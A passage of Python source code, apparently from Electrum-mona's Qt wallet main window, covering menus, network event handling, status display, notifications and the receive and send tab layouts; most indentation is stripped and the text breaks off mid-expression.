if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
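    def top_level_window_recurse(self, window=None, test_func=None):
        # Find the deepest visible modal child dialog; helper used by
        # top_level_window() below (follows the standard upstream Electrum logic).
        window = window or self
        classes = (WindowModalDialog, QMessageBox)
        if test_func is None:
            test_func = lambda x: True
        for child in window.children():
            # test for visibility, as old closed dialogs may not have been GC-ed yet
            if isinstance(child, classes) and child.isVisible() and test_func(child):
                return self.top_level_window_recurse(child, test_func=test_func)
        return window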
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
#elif event == 'channels_updated':
# self.channels_list.update_rows.emit(*args)
#elif event == 'channel':
# self.channels_list.update_single_row.emit(*args)
# self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker:
wallet.lnworker.on_channels_updated()
self.need_update.set()
        # Once the GUI has been initialized, check whether we want to announce something,
        # since the callback may have fired before the GUI existed.
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
#self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-mona Testnet" if constants.net.TESTNET else "Electrum-mona"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
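        # sanity-check the stored value: if it is not a sortable list of paths, start with an empty history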
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
if self.wallet.has_lightning():
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
        # Settings / Preferences are reserved keywords in macOS; use this menu entry as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
if self.wallet.has_lightning():
tools_menu.addAction(_("&Lightning"), self.gui_object.show_lightning_dialog)
tools_menu.addAction(_("&Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum-mona.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum-mona.org")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Discord"), lambda: webopen("https://discord.gg/vWyjJ7r"))
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('monacoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-mona",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Electrum-mona's icon from oimo at askmona.") + "\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-mona - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-mona", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-mona", message, QSystemTrayIcon.Information, 20000)
    # custom wrappers for getOpenFileName and getSaveFileName that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
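        # The 'follows' flags prevent feedback loops: when one edit programmatically
        # fills the other, the triggered textChanged handler returns early instead of echoing back.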
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_channels_tab(self, wallet):
#self.channels_list = ChannelsList(self)
#t = self.channels_list.get_toolbar()
#return self.create_list_tab(self.channels_list, t)
return
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', 3600)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('On-chain'))
self.create_invoice_button.setIcon(read_QIcon("monacoin.png"))
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=230)
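        # clicking the QR code toggles the detached QR window; show a pointing-hand cursor while hovering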
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
self.receive_widgets = QTabWidget()
self.receive_widgets.addTab(self.receive_qr, 'QR Code')
self.receive_widgets.addTab(self.receive_address_e, 'Text')
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(self.receive_widgets)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_request(self, key):
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', 3600)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
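            # no unused address available: non-deterministic wallets cannot create one,
            # deterministic wallets get a gap-limit warning before a new address is derived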
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, title, content):
self.app.clipboard().setText(content)
        self.show_message(_("{} copied to clipboard:\n\n{}").format(title, content))
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
def update_receive_qr(self):
uri = str(self.receive_address_e.text())
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
# note: 'addr' could be ln invoice or BIP21 URI
try:
uri = util.parse_URI(addr)
except InvalidBitcoinURI:
pass
else:
addr = uri.get('address')
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
